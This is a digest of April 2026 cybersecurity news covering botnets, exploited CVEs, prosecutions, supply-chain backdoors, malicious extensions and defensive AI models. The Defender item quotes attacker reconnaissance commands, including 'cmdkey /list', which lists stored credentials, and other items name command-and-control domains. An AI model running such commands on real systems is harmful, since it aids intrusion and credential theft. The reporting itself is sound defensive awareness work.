Security vendors on April 18, 2026, warned of a new Mirai-family botnet called Nexcorium that exploits a command-injection flaw (CVE-2024-3721) in TBK DVR models — primarily DVR-4104 and DVR-4216 — to build large-scale DDoS botnets. Fortinet FortiGuard Labs and other researchers found attackers delivering a downloader script that fetches multi-architecture payloads (ARM, MIPS, x86-64), then establishes persistence via modifications to /etc/inittab, /etc/rc.local, systemd services and cron jobs. Nexcorium embeds XOR-encoded configuration data, supports multiple flood types (UDP, TCP SYN/ACK, SMTP and others), includes brute-force Telnet credentials and reuses older exploits such as CVE-2017-17215 to broaden its reach. Unit 42 and others also observed scans targeting end-of-life TP‑Link routers; CISA had previously listed related flaws in its Known Exploited Vulnerabilities catalogue. Researchers note the campaign bears markers referencing a so‑called “Nexus Team.” Organisations are advised to patch or decommission vulnerable devices, remove default credentials, apply network segmentation and monitor for abnormal outbound connections to known C2 domains.

Tyler Robert Buchanan, 24, of Dundee, Scotland, pleaded guilty in the U.S. Central District of California to conspiracy to commit wire fraud and aggravated identity theft for his role in a phishing campaign that stole at least $8 million in virtual currency. Prosecutors say Buchanan and co‑conspirators ran the scheme from September 2021 to April 2023, sending hundreds of spoofed text messages that directed employees to fraudulent websites and captured login credentials. Stolen credentials and cryptocurrency seed phrases were reportedly shared on a Telegram channel administered by Buchanan. Court documents say the group targeted telecoms, IT suppliers, cloud communications firms, virtual asset companies and individuals — impacting at least a dozen companies and, in some filings, as many as 45 victims across the United States, Canada, India and the United Kingdom. Police Scotland assisted the FBI. Buchanan has been in U.S. custody since April 2025 and faces a maximum sentence of 22 years at a sentencing hearing set for Aug. 21. Several alleged co‑conspirators remain charged in U.S. courts; one has already pleaded guilty and been sentenced.

Nicholas Moore, a 25-year-old Tennessee man who admitted repeatedly accessing the U.S. Supreme Court’s electronic filing system and the networks of AmeriCorps and the Department of Veterans Affairs, was sentenced to 12 months of probation on April 17, 2026. Moore pleaded guilty in January to a misdemeanor count of fraud and related activity in connection with computers, admitting he used stolen login credentials to view and sometimes post victims’ personal information to an Instagram account called @ihackedthegovernment. Prosecutors said he accessed the Supreme Court e-filing account on more than 25 days in 2023 and revealed details from other federal systems, including phone numbers and medical data, but reported no financial losses. The Justice Department recommended probation rather than incarceration, characterizing Moore as a “vulnerable young man” with long-term disabilities; prosecutors had sought up to 36 months of probation while the defense sought 12 months. U.S. District Judge Beryl Howell imposed the 12-month probation term and did not order prison time or fines at sentencing.

Security researchers and vendors warn that three Microsoft Defender vulnerabilities—BlueHammer, RedSun and UnDefend—have been published as proof-of-concept code and are being weaponized in real-world attacks. The exploits were released on GitHub by a researcher using the aliases Chaotic Eclipse / Nightmare‑Eclipse after a dispute with Microsoft’s Security Response Center. BlueHammer (tracked as CVE-2026-33825) was publicly released in early April and patched by Microsoft in the April Patch Tuesday updates; Huntress reported BlueHammer exploitation beginning April 10. RedSun and UnDefend were published mid‑April and, as of April 16–18 reporting, remained unpatched. RedSun’s PoC enables local privilege escalation to SYSTEM by abusing Defender’s cloud-file handling to overwrite protected binaries; UnDefend can be used by a standard user to block Defender signature updates, degrading protection. Vendors have observed attacker activity consistent with hands‑on‑keyboard post‑exploitation (e.g., whoami /priv, cmdkey /list, net group). Microsoft says it supports coordinated disclosure. Security teams are urged to apply available updates, monitor endpoint telemetry for suspicious local executable activity and known IOC patterns, and isolate affected hosts while emergency mitigations and patches are developed.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a high‑severity Apache ActiveMQ vulnerability, CVE-2026-34197, to its Known Exploited Vulnerabilities (KEV) list on April 16–17, 2026, citing confirmed active exploitation. The flaw, described as improper input validation in ActiveMQ’s Jolokia management API, can enable remote code execution by convincing the broker to fetch remote configuration and run OS commands. Researcher Naveen Sunkavally of Horizon3 said the bug had been present in the codebase for about 13 years and was discovered with assistance from an AI tool. CISA’s KEV listing triggered Binding Operational Directive 22-01, giving federal civilian agencies until April 30, 2026 to patch or explain mitigation steps. Apache has issued fixes; administrators are urged to apply the vendor updates for the 5.19.x and 6.2.x series, audit externally reachable Jolokia endpoints, disable or restrict Jolokia where unnecessary, remove default credentials and monitor for signs of compromise. Security firms report thousands of exposed ActiveMQ instances and evidence of scans and exploitation attempts in the wild.

Grinex, a Kyrgyzstan-registered crypto exchange linked to Russia and sanctioned by the U.S., U.K. and EU, suspended operations after suffering a cyber heist that stole roughly 1 billion roubles (about $13.1 million) in mid-April 2026. Blockchain intelligence firms TRM Labs and Elliptic put the value of drained addresses at between $13.7 million and $15 million and identified about 70 linked addresses. Analysts say much of the stolen USDT was rapidly swapped into TRX or ETH to reduce the chance of freezing by Tether. TokenSpot, a separate Kyrgyz exchange with on-chain ties to Grinex, was also disrupted but lost only a small amount. Grinex accused “western intelligence” agencies of orchestrating the attack and said preliminary findings indicate the operation aimed to damage Russia’s financial sovereignty; those claims have not been independently verified. U.S. authorities previously sanctioned Grinex as a rebrand of Garantex, which U.S. Treasury accused of laundering illicit proceeds. Grinex has reported the incident to law enforcement and shared wallet data publicly.

A coordinated international law enforcement operation led by Europol has seized 53 web domains linked to DDoS-for-hire (“booter”) services and identified more than 3 million user accounts, authorities said. Operation PowerOFF, conducted April 13–16, involved agencies from 21 countries including the United States, United Kingdom, Japan, Germany and Brazil. The action resulted in four arrests, execution of 25 search warrants, seizure of servers and databases, removal of over 100 URLs from search results, and targeted warning ads aimed at potential users. Using data recovered from seized infrastructure, police and partners sent more than 75,000 emails and letters — and posted warnings on blockchain and cryptocurrency channels — to suspected customers of the services. U.S. agencies also seized several domains and infrastructure tied to named booter services. Officials said the takedowns disrupted technical backends that enabled attacks and combined enforcement with prevention measures to deter new users. Europol described DDoS-for-hire as a prolific, low-barrier cybercrime that can be used for harassment, extortion or to knock critical online services offline.

The U.S. Department of Justice on April 15 announced prison terms for two New Jersey men who helped a North Korean government-run operation place remote IT workers inside American companies. Kejia (Tony) Wang, 42, was sentenced to 108 months and Zhenxing (Danny) Wang, 39, to 92 months after pleading guilty to conspiracy charges including wire fraud, money laundering and identity theft. Prosecutors say the men ran or hosted so‑called “laptop farms,” created shell companies and used the stolen identities of at least 80 U.S. residents to secure jobs for North Korean operatives at more than 100 U.S. firms, including Fortune 500 companies and a California-based defense contractor. The scheme generated roughly $5 million for the DPRK and inflicted an estimated $3 million in remediation and legal costs on victim firms; the defendants and co‑facilitators collected about $696,000, of which $600,000 was ordered forfeited. Court filings say one overseas worker accessed export‑controlled data. Authorities continue to seek additional co‑conspirators and have offered rewards for information.

The U.S. National Institute of Standards and Technology (NIST) said this week it will drastically narrow which Common Vulnerabilities and Exposures (CVE) entries receive detailed analysis — or “enrichment” — in the National Vulnerability Database (NVD). Facing a swelling backlog and a 263% rise in CVE submissions between 2020 and 2025, NIST will prioritize enrichment only for CVEs listed in CISA’s Known Exploited Vulnerabilities (KEV) catalog, flaws affecting software used by the federal government, and defects in “critical software” defined under Executive Order 14028. All CVEs will still be listed, but many will be marked “Not Scheduled” and not receive NIST-authored CVSS scores; the agency will generally accept severity ratings supplied by CVE Numbering Authorities. NIST said it enriched nearly 42,000 CVEs in 2025 and that submissions in early 2026 are roughly one-third higher than a year earlier. The change follows a 2024 funding lapse and an operational strain amplified by AI-driven vulnerability discovery. Users can request case-by-case enrichment via nvd@nist.gov. The agency said the shift buys time to build automated tools and stabilize the NVD program.

Microsoft has deployed new protections in its April 2026 cumulative updates for Windows 10 and Windows 11 to block a growing phishing vector that abuses Remote Desktop Protocol (.rdp) files. The updates (including KB5082200 for Windows 10 and KB5083769 / KB5082052 for Windows 11) introduce a one‑time educational prompt when users first open an RDP file and then require a security dialog on subsequent opens. That dialog displays whether the file is digitally signed, the remote system address, and lists any requested local resource redirections (drives, clipboard, devices) which are disabled by default until explicitly approved. The protections apply only when RDP files are opened directly, not to connections initiated inside the Remote Desktop client. Administrators can temporarily disable the warnings via a registry policy, and Microsoft warns that file signatures do not guarantee safety. The change responds to real-world abuse — notably by state‑linked groups using rogue RDP files in phishing campaigns — and Microsoft says future updates may deprecate older connection settings.

Swedish authorities disclosed on April 15, 2026 that a pro‑Russian cyber group with links to Russian intelligence attempted to disrupt operations at a thermal/heating plant in western Sweden in spring 2025. Civil Defence Minister Carl‑Oskar Bohlin said the attack failed because a built‑in protection mechanism prevented serious consequences. The Swedish Security Service identified the actor and the Security Police later closed their investigation, according to officials. Moscow rejected the allegations. Swedish officials framed the incident as part of a rising wave of hybrid and cyber attacks across Europe since Russia’s full‑scale invasion of Ukraine in 2022, noting a shift from denial‑of‑service operations to more sophisticated strikes aimed at operational technology that controls physical infrastructure. The government linked the episode to similar disruption attempts in Poland, Denmark and Norway that targeted energy, water and transport systems. Authorities have not named the affected facility or released technical details of the intrusion publicly.

Security firm ReliaQuest on April 15, 2026 published research showing a surge in a fast-scale intrusion campaign that mirrors the playbook of the defunct Black Basta ransomware group. The campaign, active since at least May 2025 and accelerating in March 2026, has targeted more than 100 employees across dozens of organizations with a heavy focus on senior leadership — roughly three-quarters of observed targets were executives, directors or managers. Attackers combine mass “email bombing” with Microsoft Teams help-desk impersonation to push victims to install remote monitoring and management (RMM) tools such as Supremo or to use Windows Quick Assist. Once connected, operators execute scripts disguised as legitimate utilities to gain hands-on access. ReliaQuest says the activity uses disposable Microsoft tenants, Russia-based source IPs and a highly automated workflow that enables intrusions within minutes. The highest-hit sectors include manufacturing, professional, scientific and technical services, finance and insurance, construction and technology. While researchers have not yet observed widespread ransomware encryption in the current wave, they warn the activity is consistent with pre-ransomware staging and could lead to data theft, extortion or subsequent ransomware deployment.

WASHINGTON, April 15, 2026 — Russia-linked hackers compromised more than 170 email accounts belonging to Ukrainian prosecutors and investigators and at least 284 inboxes overall between September 2024 and March 2026, Reuters reported after reviewing data exposed by researchers. The data, left on a server and discovered by Ctrl-Alt-Intel, included logs of successful operations and thousands of stolen emails. Targets included the Specialized Prosecutor's Office in the Field of Defense, the Asset Recovery and Management Agency (ARMA), the Prosecutor’s Training Center and the Specialized Anti-Corruption Prosecutor’s Office (SAPO). Named victims in the dataset included former ARMA head Yaroslava Maksymenko and Prosecutor’s Training Center deputy Oleg Duka. The intrusion also affected entities in neighboring NATO countries and the Balkans — including at least 67 Romanian Air Force accounts and 27 inboxes tied to Greece’s General Staff — and local bodies in occupied areas such as Pokrovsk. Cybersecurity researchers linked the campaign to a Russia-aligned military hacking group commonly called “Fancy Bear,” though some experts urged caution in firm attribution. Ukraine’s CERT has investigated compromises; Moscow did not comment.

Security researchers disclosed a coordinated supply‑chain attack that placed backdoors into more than 30 WordPress plugins sold under the “Essential Plugin” portfolio. The plugins were bought on the marketplace Flippa by a buyer using the name “Kris” for a six‑figure sum; a malicious PHP deserialization backdoor was introduced in an August 8, 2025 update and remained dormant until it activated on April 5–6, 2026. During the activation window a command‑and‑control service at analytics.essentialplugin.com delivered payloads that injected code into wp-config.php and served cloaked SEO spam and redirects exclusively to Googlebot. WordPress.org permanently closed 31 affected plugins on April 7, 2026, and pushed an update to neutralise the phone‑home mechanism in plugin files, but the injected wp-config.php entries require manual cleanup. Researchers warn the attacker’s C2 resolution used an Ethereum smart contract, complicating domain takedown. The campaign echoes past plugin‑sale compromises and highlights a systemic gap: WordPress currently performs no ownership‑transfer code reviews or mandatory update code signing, leaving hundreds of thousands of sites at risk.

Security researchers at Socket disclosed on April 15, 2026, a coordinated campaign of 108 malicious Google Chrome extensions that together have around 20,000 installs on the Chrome Web Store. The add-ons, published under five developer identities (Yana Project, GameGen, SideGames, Rodeo Games and InterAlt), report to a common command-and-control backend (cloudapi[.]stream) and carry a mix of malicious behaviors. Fifty-four extensions harvest Google OAuth2 identity data, 45 contain a persistent backdoor that can open arbitrary URLs at browser start, and several strip security headers to inject ads into YouTube and TikTok. The most severe sample repeatedly exfiltrates active Telegram Web sessions every 15 seconds, enabling full account access without passwords or MFA. Socket has submitted takedown requests to Google and Chrome Web Store security teams; many extensions remained live at the time of reporting. Researchers warn the operation resembles a malware-as-a-service model, with some code comments suggesting Russian-language origins, but no definitive attribution has been made. Users are urged to audit installed extensions, remove any listed by Socket, revoke suspicious Google app access, and terminate other Telegram Web sessions if they used the flagged Telegram add-ons.

Google has integrated a Rust-based Domain Name System (DNS) parser into the Pixel 10’s cellular modem firmware, the company’s first deployment of memory-safe code at that layer. Announced in mid-April 2026, the change replaces a risky C/C++ DNS parsing path with a no_std adaptation of the hickory-proto Rust crate and adds roughly 371KB to modem firmware. The goal is to eliminate an entire class of memory-safety bugs—such as buffer overflows and use-after-free errors—that have historically enabled remote code execution against basebands. Google’s Project Zero has previously cataloged severe modem vulnerabilities in Exynos-based chips, underscoring the exposure of legacy baseband stacks. Rather than rewriting the entire modem, Google isolated the DNS parser, routing untrusted packets through Rust before they hit legacy code. The company used tooling (including a custom cargo-gnaw process) to manage dependencies and maintain a compact footprint suitable for real-time baseband constraints. Pixel 10 users should see no change in performance or connectivity; the update is intended to harden a neglected attack surface and serve as a template for expanding memory-safe components in future devices.

Microsoft on April 14-15 released one of its largest Patch Tuesday updates, addressing roughly 165–167 vulnerabilities across Windows and related products and shipping cumulative Windows 11 packages (KB5083769/KB5082052). The rollout includes two zero-days: CVE-2026-32201, a SharePoint Server spoofing flaw that Microsoft says was actively exploited and has been added to CISA’s Known Exploited Vulnerabilities list; and CVE-2026-33825, an elevation-of-privilege defect in Microsoft Defender (publicly disclosed and linked to exploit code nicknamed “BlueHammer”). The cycle also patched multiple critical issues, including a near-9.8 CVSS remote-code-execution bug in the IKEv2 extension (CVE-2026-33824), numerous elevation-of-privilege flaws, Office and RDP-related bugs, and quality-of-life fixes for Windows 11. Security firms warned administrators to prioritise emergency remediation, audit externally facing SharePoint instances, and deploy mitigations where immediate patching is not possible.

Musician Garrett “G. Love” Dutton said he lost roughly 5.9 bitcoin — about $424,000 — after downloading a counterfeit Ledger wallet app from Apple’s Mac App Store while transferring his hardware wallet to a new computer. Dutton posted the incident on X on April 11, saying he entered his 24‑word seed phrase into the malicious app and watched his retirement savings vanish. Blockchain investigator ZachXBT traced the funds through nine transactions to addresses on the KuCoin exchange. KuCoin said it had temporarily frozen a suspicious account for seven days and noted that any further action would require formal legal steps. Researchers and outlets report the fake app appears to have been removed from Apple’s store, though Apple had made no public statement at the time of reporting. Dutton has urged caution to others and acknowledged the mistake. The theft adds to a series of losses involving counterfeit crypto software and highlights persistent gaps in app‑store and end‑user protections for self‑custodied digital assets.

April 14–15, 2026 — OpenAI unveiled GPT-5.4‑Cyber, a variant of its GPT‑5.4 large language model fine‑tuned for defensive cybersecurity, and announced a scaled-up Trusted Access for Cyber (TAC) programme. The model is designed with a lower refusal boundary for legitimate security work and adds capabilities such as binary reverse engineering to analyse compiled software for malware and vulnerabilities. OpenAI said GPT‑5.4‑Cyber will be rolled out iteratively and only to vetted security vendors, thousands of verified individual defenders and hundreds of teams; the highest verification tiers unlock the most permissive capabilities. Access is governed by stronger know‑your‑customer checks and may require concessions such as restrictions on Zero‑Data Retention in some deployments. The announcement follows Anthropic’s early April release of its Claude Mythos Preview under Project Glasswing and highlights differing approaches: Anthropic’s tightly gated, big‑tech partner model versus OpenAI’s broader verified access. OpenAI also cited complementary efforts such as its Codex Security tool, which it says has helped fix over 3,000 critical and high‑severity vulnerabilities, and framed the release as part of an iterative safety and ecosystem resilience strategy.

Adobe released emergency patches in April 2026 for a critical zero-day tracked as CVE-2026-34621 that security researchers say was actively exploited for months. The flaw affected Acrobat DC, Acrobat 2024 and Reader DC on Windows and macOS and was disclosed after researcher Haifei Li of EXPMON analyzed a malicious PDF sample first seen on VirusTotal in late 2025. Attackers used obfuscated JavaScript inside crafted PDFs to fingerprint hosts (collecting OS and Reader versions, language settings and file paths) and selectively deploy a second-stage payload capable of remote code execution or sandbox escape. Initial severity was rated 9.6 but Adobe reassessed the vector and set the CVSS to 8.6. Evidence from researchers points to targeted, selective profiling—some lures referenced oil and gas themes and Russian-language content—raising concerns about espionage-style campaigns. Adobe confirmed exploitation in the wild, urged immediate updates and provided fixes across affected builds; agencies including CISA added the flaw to known exploited vulnerabilities, mandating remediation timelines. No practical workaround was available, so patching and endpoint review were recommended as the primary mitigations.